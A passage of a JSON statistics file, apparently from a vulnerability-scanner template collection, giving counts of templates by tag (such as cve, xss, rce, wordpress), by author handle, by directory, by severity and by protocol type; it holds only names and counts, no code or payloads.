ame":"cve2012","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"php","count":8},{"name":"cve2013","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"confluence","count":5},{"name":"headless","count":5},{"name":"laravel","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"jetty","count":5},{"name":"solr","count":5},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"webserver","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"ibm","count":4},{"name":"tomcat","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"router","count":4},{"name":"django","count":4},{"name":"elastic","count":4},{"name":"thinkphp","count":4},{"name":"docker","count":4},{"name":"netgear","count":4},{"name":"cve2009","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"springcloud","count":3},{"name":"lfr","count":3},{"name":"dedecms","count":3},{"name":"git","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"nacos","count":3},{"name":"slack","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"bypass","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"deserialization","count":3},{"name":"windows","count":3},{"name":"openssh","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"amazon","count":3},{"name":"crlf","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"backups","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"terramaster","count":3},{"name":"grafana","count":3},{"name":"cve2008","count":2},{"name":"intrusive","count":2},{"name":"rockmongo","count":2},{"name":"seeyon","count":2},{"name":"proxy","count":2},{"name":"nexus","count":2},{"name":"zhiyuan","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"vrealize","count":2},{"name":"httpd","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"pega","count":2},{"name":"hjtcloud","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"trixbox","count":2},{"name":"rstudio","count":2},{"name":"sonicwall","count":2},{"name":"ucmdb","count":2},{"name":"exposures","count":2},{"name":"mail","count":2},{"name":"service","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"icewarp","count":2},{"name":"leak","count":2},{"name":"yapi","count":2},{"name":"jboss","count":2},{"name":"cache","count":2},{"name":"dos","count":2},{"name":"prometheus","count":2},{"name":"bigip","count":2},{"name":"telerik","count":2},{"name":"rockethchat","count":2},{"name":"paloalto","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"idrac","count":2},{"name":"odoo","count":2},{"name":"kibana","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"globalprotect","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"wordfence","count":2},{"name":"openam","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"splunk","count":2},{"name":"keycloak","count":2},{"name":"showdoc","count":2},{"name":"sharepoint","count":2},{"name":"shellshock","count":2},{"name":"zabbix","count":2},{"name":"hpe","count":2},{"name":"smtp","count":2},{"name":"smb","count":2},{"name":"frp","count":2},{"name":"hp","count":2},{"name":"saltstack","count":2},{"name":"spark","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"bitrix","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"synnefo","count":1},{"name":"jsp","count":1},{"name":"salesforce","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"octobercms","count":1},{"name":"dotnet","count":1},{"name":"landray","count":1},{"name":"mediumish","count":1},{"name":"portainer","count":1},{"name":"spectracom","count":1},{"name":"tpshop","count":1},{"name":"node-red-dashboard","count":1},{"name":"cloudflare","count":1},{"name":"cocoon","count":1},{"name":"plugin","count":1},{"name":"zookeeper","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"bruteforce","count":1},{"name":"selea","count":1},{"name":"mongo","count":1},{"name":"javamelody","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"sco","count":1},{"name":"horde","count":1},{"name":"symfony","count":1},{"name":"netdata","count":1},{"name":"mcafee","count":1},{"name":"opm","count":1},{"name":"zeroshell","count":1},{"name":"email","count":1},{"name":"geddy","count":1},{"name":"centos","count":1},{"name":"jquery","count":1},{"name":"esmtp","count":1},{"name":"chinaunicom","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"wavemaker","count":1},{"name":"erp-nc","count":1},{"name":"domxss","count":1},{"name":"ntopng","count":1},{"name":"exchange","count":1},{"name":"wazuh","count":1},{"name":"tapestry","count":1},{"name":"cve2005","count":1},{"name":"mantisbt","count":1},{"name":"status","count":1},{"name":"mirai","count":1},{"name":"viewpoint","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"discourse","count":1},{"name":"xdcms","count":1},{"name":"razor","count":1},{"name":"turbocrm","count":1},{"name":"extractor","count":1},{"name":"nc2","count":1},{"name":"yachtcontrol","count":1},{"name":"huijietong","count":1},{"name":"szhe","count":1},{"name":"vsphere","count":1},{"name":"rabbitmq","count":1},{"name":"cse","count":1},{"name":"apiman","count":1},{"name":"pgadmin","count":1},{"name":"xiuno","count":1},{"name":"axis","count":1},{"name":"landrayoa","count":1},{"name":"rsyncd","count":1},{"name":"fiori","count":1},{"name":"nsasg","count":1},{"name":"diris","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"beanshell","count":1},{"name":"cors","count":1},{"name":"timeclock","count":1},{"name":"tileserver","count":1},{"name":"rfi","count":1},{"name":"stem","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"fastcgi","count":1},{"name":"jeewms","count":1},{"name":"expn","count":1},{"name":"firebase","count":1},{"name":"2014","count":1},{"name":"cgi","count":1},{"name":"triconsole","count":1},{"name":"avalanche","count":1},{"name":"primetek","count":1},{"name":"tamronos","count":1},{"name":"enumeration","count":1},{"name":"hadoop","count":1},{"name":"netrc","count":1},{"name":"pacsone","count":1},{"name":"itop","count":1},{"name":"pippoint","count":1},{"name":"phpinfo","count":1},{"name":"fortigate","count":1},{"name":"linksys","count":1},{"name":"cve2010","count":1},{"name":"pulsesecure","count":1},{"name":"acexy","count":1},{"name":"wifisky","count":1},{"name":"krweb","count":1},{"name":"panabit","count":1},{"name":"spf","count":1},{"name":"svn","count":1},{"name":"kyan","count":1},{"name":"moinmoin","count":1},{"name":"ulterius","count":1},{"name":"cobub","count":1},{"name":"svnserve","count":1},{"name":"dotnetnuke","count":1},{"name":"mpsec","count":1},{"name":"lotuscms","count":1},{"name":"nps","count":1},{"name":"majordomo2","count":1},{"name":"ruby","count":1},{"name":"plc","count":1},{"name":"skywalking","count":1},{"name":"opencast","count":1},{"name":"saltapi","count":1},{"name":"ricoh","count":1},{"name":"cve2007","count":1},{"name":"openerp","count":1},{"name":"azure","count":1},{"name":"oscommerce","count":1},{"name":"dlogin","count":1},{"name":"webftp","count":1},{"name":"blue-ocean","count":1},{"name":"dom","count":1},{"name":"sqlite","count":1},{"name":"robomongo","count":1},{"name":"appweb","count":1},{"name":"shopware","count":1},{"name":"linkedin","count":1},{"name":"adminer","count":1},{"name":"ssltls","count":1},{"name":"glances","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"klog","count":1},{"name":"wso2","count":1},{"name":"nordex","count":1},{"name":"mautic","count":1},{"name":"nette","count":1},{"name":"wp-theme","count":1},{"name":"wooyun","count":1},{"name":"viewlinc","count":1},{"name":"redhat","count":1},{"name":"gloo","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"optiLink","count":1},{"name":"xunchi","count":1},{"name":"vsftpd","count":1},{"name":"xff","count":1},{"name":"nomad","count":1},{"name":"csrf","count":1},{"name":"favicon","count":1},{"name":"rhymix","count":1},{"name":"redwood","count":1},{"name":"ambari","count":1},{"name":"maccmsv10","count":1},{"name":"scs","count":1},{"name":"ns","count":1},{"name":"bitly","count":1},{"name":"openstack","count":1},{"name":"haproxy","count":1},{"name":"clockwatch","count":1},{"name":"aspnuke","count":1},{"name":"fedora","count":1},{"name":"pyramid","count":1},{"name":"memcached","count":1},{"name":"linkerd","count":1},{"name":"ems","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"mysql","count":1},{"name":"interlib","count":1},{"name":"timesheet","count":1},{"name":"alerta","count":1},{"name":"enum","count":1},{"name":"ioncube","count":1},{"name":"biometrics","count":1},{"name":"nexusdb","count":1},{"name":"acme","count":1},{"name":"octoprint","count":1},{"name":"floc","count":1},{"name":"kubeflow","count":1},{"name":"swagger","count":1},{"name":"arl","count":1},{"name":"sprintful","count":1},{"name":"ssl","count":1},{"name":"zcms","count":1},{"name":"calendarix","count":1},{"name":"dvr","count":1},{"name":"druid","count":1},{"name":"jmx","count":1},{"name":"spidercontrol","count":1},{"name":"sidekiq","count":1},{"name":"tensorboard","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"upload","count":1},{"name":"rubedo","count":1},{"name":"openrestry","count":1},{"name":"grails","count":1},{"name":"jnoj","count":1},{"name":"javafaces","count":1},{"name":"traefik","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"springframework","count":1},{"name":"sarg","count":1},{"name":"mdb","count":1},{"name":"sentry","count":1},{"name":"codeigniter","count":1},{"name":"k8s","count":1},{"name":"jenzabar","count":1},{"name":"zimbra","count":1},{"name":"embedthis","count":1},{"name":"phalcon","count":1},{"name":"fortiweb","count":1},{"name":"clusterengine","count":1},{"name":"tika","count":1},{"name":"gogs","count":1},{"name":"seacms","count":1},{"name":"payara","count":1},{"name":"bookstack","count":1},{"name":"aura","count":1},{"name":"nedi","count":1},{"name":"fuelcms","count":1},{"name":"fortigates","count":1},{"name":"avtech","count":1},{"name":"labtech","count":1},{"name":"discord","count":1},{"name":"anchorcms","count":1},{"name":"mailchimp","count":1},{"name":"kafdrop","count":1},{"name":"livezilla","count":1},{"name":"darkstat","count":1},{"name":"codemeter","count":1},{"name":"hortonworks","count":1},{"name":"crm","count":1},{"name":"opensmtpd","count":1},{"name":"sitecore","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"db","count":1},{"name":"servicedesk","count":1},{"name":"wamp","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"blackboard","count":1},{"name":"redis","count":1},{"name":"tongda","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"circontrol","count":1},{"name":"checkpoint","count":1},{"name":"harbor","count":1},{"name":"dvwa","count":1},{"name":"zmanda","count":1},{"name":"st","count":1},{"name":"csod","count":1},{"name":"duomicms","count":1},{"name":"rdp","count":1},{"name":"comodo","count":1},{"name":"episerver","count":1},{"name":"opentsdb","count":1},{"name":"servicenow","count":1},{"name":"igs","count":1},{"name":"setup","count":1},{"name":"kong","count":1},{"name":"eyou","count":1},{"name":"wuzhicms","count":1},{"name":"trilithic","count":1},{"name":"geutebruck","count":1},{"name":"blind","count":1},{"name":"targa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"kerbynet","count":1},{"name":"upnp","count":1},{"name":"b2evolution","count":1},{"name":"zarafa","count":1},{"name":"netis","count":1},{"name":"mobileiron","count":1},{"name":"keenetic","count":1},{"name":"moin","count":1},{"name":"phpunit","count":1},{"name":"htmli","count":1},{"name":"wildfly","count":1},{"name":"heroku","count":1},{"name":"wiki","count":1},{"name":"cloudinary","count":1},{"name":"tenda","count":1},{"name":"thinkadmin","count":1},{"name":"webui","count":1},{"name":"jsf","count":1},{"name":"gridx","count":1},{"name":"zend","count":1},{"name":"akamai","count":1},{"name":"gitlist","count":1},{"name":"nuuo","count":1},{"name":"doh","count":1},{"name":"74cms","count":1},{"name":"proftpd","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"tensorflow","count":1},{"name":"jitsi","count":1},{"name":"plone","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"monitorix","count":1},{"name":"ecom","count":1},{"name":"yii","count":1},{"name":"webmin","count":1},{"name":"webadmin","count":1},{"name":"ueditor","count":1},{"name":"lancom","count":1},{"name":"lanproxy","count":1},{"name":"concrete","count":1},{"name":"ilo4","count":1},{"name":"goahead","count":1},{"name":"opensns","count":1},{"name":"grav","count":1},{"name":"bolt","count":1},{"name":"netsweeper","count":1},{"name":"totaljs","count":1},{"name":"feifeicms","count":1},{"name":"flink","count":1},{"name":"finereport","count":1},{"name":"rujjie","count":1},{"name":"webmodule-ee","count":1},{"name":"fortilogger","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"flash","count":1},{"name":"weiphp","count":1},{"name":"vscode","count":1},{"name":"varnish","count":1},{"name":"npm","count":1},{"name":"emc","count":1},{"name":"drone","count":1},{"name":"alertmanager","count":1},{"name":"gateone","count":1},{"name":"mara","count":1},{"name":"shopxo","count":1},{"name":"jenkin","count":1},{"name":"subrion","count":1},{"name":"rmi","count":1},{"name":"powercreator","count":1},{"name":"postmessage","count":1},{"name":"liferay","count":1},{"name":"backdoor","count":1},{"name":"panos","count":1},{"name":"zte","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"aashiq","count":8},{"name":"wdahlenb","count":8},{"name":"iamthefrogy","count":8},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"that_juan_","count":7},{"name":"r3dg33k","count":7},{"name":"dr_set","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"caspergn","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"shifacyclewala","count":2},{"name":"gevakun","count":2},{"name":"0xprial","count":2},{"name":"mavericknerd","count":2},{"name":"foulenzer","count":2},{"name":"elsfa7110","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"jarijaas","count":2},{"name":"lu4nx","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"daviey","count":1},{"name":"_generic_human_","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nkxxkn","count":1},{"name":"j33n1k4","count":1},{"name":"tim_koopmans","count":1},{"name":"naglinagli","count":1},{"name":"koti2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"notsoevilweasel","count":1},{"name":"pdp","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"deena","count":1},{"name":"regala_","count":1},{"name":"bjhulst","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alifathi-h1","count":1},{"name":"dogasantos","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"zhenwarx","count":1},{"name":"smaranchand","count":1},{"name":"elmahdi","count":1},{"name":"kabirsuda","count":1},{"name":"luskabol","count":1},{"name":"akshansh","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"0xtavian","count":1},{"name":"raesene","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"juicypotato1","count":1},{"name":"flag007","count":1},{"name":"furkansenan","count":1},{"name":"rtcms","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"yavolo","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"shifacyclewla","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"absshax","count":1},{"name":"sickwell","count":1},{"name":"fabaff","count":1},{"name":"nytr0gen","count":1},{"name":"ooooooo_q","count":1},{"name":"alph4byt3","count":1},{"name":"gboddin","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"exploitation","count":1},{"name":"dudez","count":1},{"name":"iampritam","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"bad5ect0r","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sy3omda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"vsh00t","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"fopina","count":1},{"name":"wabafet","count":1},{"name":"mohammedsaneem","count":1},{"name":"qlkwej","count":1},{"name":"ldionmarcil","count":1},{"name":"hanlaomo","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"apt-mirror","count":1},{"name":"omarkurt","count":1},{"name":"thezakman","count":1},{"name":"d0rkerdevil","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"ipanda","count":1},{"name":"dawid czarnecki","count":1},{"name":"ajaysenr","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"c3l3si4n","count":1},{"name":"mubassirpatel","count":1},{"name":"toufik airane","count":1},{"name":"whynotke","count":1},{"name":"abison_binoy","count":1},{"name":"bing0o","count":1},{"name":"bolli95","count":1},{"name":"undefl0w","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"taielab","count":1},{"name":"affix","count":1},{"name":"idealphase","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"gal nagli","count":1},{"name":"luci","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"0xrod","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"chron0x","count":1},{"name":"r3naissance","count":1},{"name":"w4cky_","count":1},{"name":"akash.c","count":1},{"name":"b4uh0lz","count":1},{"name":"arcc","count":1},{"name":"sullo","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"logs","count":24},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"sap","count":14},{"name":"cve2016","count":14},{"name":"misconfig","count":13},{"name":"cve2015","count":13},{"name":"struts","count":13},{"name":"debug","count":13},{"name":"fuzz","count":13},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"auth-bypass","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":10},{"name":"devops","count":10},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"magento","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"php","count":8},{"name":"aws","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"cve2013","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"joomla","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"scada","count":7},{"name":"nginx","count":6},{"name":"rconfig","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"google","count":6},{"name":"citrix","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"rails","count":6},{"name":"jetty","count":5},{"name":"phpmyadmin","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"dell","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"login","count":5},{"name":"drupal","count":5},{"name":"laravel","count":5},{"name":"circarlife","count":5},{"name":"ruijie","count":5},{"name":"moodle","count":4},{"name":"thinkcmf","count":4},{"name":"hongdian","count":4},{"name":"thinkphp","count":4},{"name":"jolokia","count":4},{"name":"magmi","count":4},{"name":"docker","count":4},{"name":"django","count":4},{"name":"router","count":4},{"name":"ibm","count":4},{"name":"samsung","count":4},{"name":"elastic","count":4},{"name":"cve2009","count":4},{"name":"traversal","count":4},{"name":"netgear","count":4},{"name":"webserver","count":4},{"name":"nodejs","count":4},{"name":"asp","count":4},{"name":"solarwinds","count":4},{"name":"vpn","count":4},{"name":"artifactory","count":4},{"name":"tomcat","count":4},{"name":"fileupload","count":4},{"name":"terramaster","count":3},{"name":"springcloud","count":3},{"name":"grafana","count":3},{"name":"ofbiz","count":3},{"name":"nosqli","count":3},{"name":"windows","count":3},{"name":"fpd","count":3},{"name":"git","count":3},{"name":"openssh","count":3},{"name":"dedecms","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"lfr","count":3},{"name":"log","count":3},{"name":"amazon","count":3},{"name":"ebs","count":3},{"name":"deserialization","count":3},{"name":"kubernetes","count":3},{"name":"resin","count":3},{"name":"slack","count":3},{"name":"vbulletin","count":3},{"name":"oa","count":3},{"name":"microstrategy","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"crlf","count":3},{"name":"caucho","count":3},{"name":"printer","count":3},{"name":"bypass","count":3},{"name":"backups","count":3},{"name":"cache","count":2},{"name":"jboss","count":2},{"name":"frp","count":2},{"name":"spark","count":2},{"name":"icewarp","count":2},{"name":"rockethchat","count":2},{"name":"couchdb","count":2},{"name":"hjtcloud","count":2},{"name":"plesk","count":2},{"name":"openfire","count":2},{"name":"maian","count":2},{"name":"microsoft","count":2},{"name":"mida","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"intrusive","count":2},{"name":"keycloak","count":2},{"name":"kentico","count":2},{"name":"nexus","count":2},{"name":"zabbix","count":2},{"name":"openam","count":2},{"name":"fortios","count":2},{"name":"oauth","count":2},{"name":"sonarqube","count":2},{"name":"natshell","count":2},{"name":"kibana","count":2},{"name":"chamilo","count":2},{"name":"strapi","count":2},{"name":"hashicorp","count":2},{"name":"splunk","count":2},{"name":"leak","count":2},{"name":"smtp","count":2},{"name":"showdoc","count":2},{"name":"seeyon","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"nextjs","count":2},{"name":"dos","count":2},{"name":"bitrix","count":2},{"name":"telerik","count":2},{"name":"ucmdb","count":2},{"name":"pega","count":2},{"name":"smb","count":2},{"name":"flir","count":2},{"name":"paloalto","count":2},{"name":"nagios","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"idrac","count":2},{"name":"webcam","count":2},{"name":"zhiyuan","count":2},{"name":"saltstack","count":2},{"name":"bigip","count":2},{"name":"vrealize","count":2},{"name":"odoo","count":2},{"name":"service","count":2},{"name":"exposures","count":2},{"name":"proxy","count":2},{"name":"waf","count":2},{"name":"wordfence","count":2},{"name":"yapi","count":2},{"name":"jellyfin","count":2},{"name":"mail","count":2},{"name":"emerge","count":2},{"name":"cve2008","count":2},{"name":"sharepoint","count":2},{"name":"huawei","count":2},{"name":"voipmonitor","count":2},{"name":"hp","count":2},{"name":"sonicwall","count":2},{"name":"injection","count":2},{"name":"shellshock","count":2},{"name":"glassfish","count":2},{"name":"activemq","count":2},{"name":"xxljob","count":2},{"name":"rockmongo","count":2},{"name":"wmt","count":1},{"name":"apiman","count":1},{"name":"csrf","count":1},{"name":"netdata","count":1},{"name":"maccmsv10","count":1},{"name":"panos","count":1},{"name":"cloudflare","count":1},{"name":"74cms","count":1},{"name":"zcms","count":1},{"name":"spring","count":1},{"name":"nc2","count":1},{"name":"fastapi","count":1},{"name":"sitecore","count":1},{"name":"oscommerce","count":1},{"name":"tongda","count":1},{"name":"yii","count":1},{"name":"esmtp","count":1},{"name":"fastcgi","count":1},{"name":"majordomo2","count":1},{"name":"redwood","count":1},{"name":"wavemaker","count":1},{"name":"tapestry","count":1},{"name":"postgres","count":1},{"name":"ueditor","count":1},{"name":"erp-nc","count":1},{"name":"blackboard","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"checkpoint","count":1},{"name":"varnish","count":1},{"name":"viewpoint","count":1},{"name":"emc","count":1},{"name":"fortigates","count":1},{"name":"cors","count":1},{"name":"blind","count":1},{"name":"zzzcms","count":1},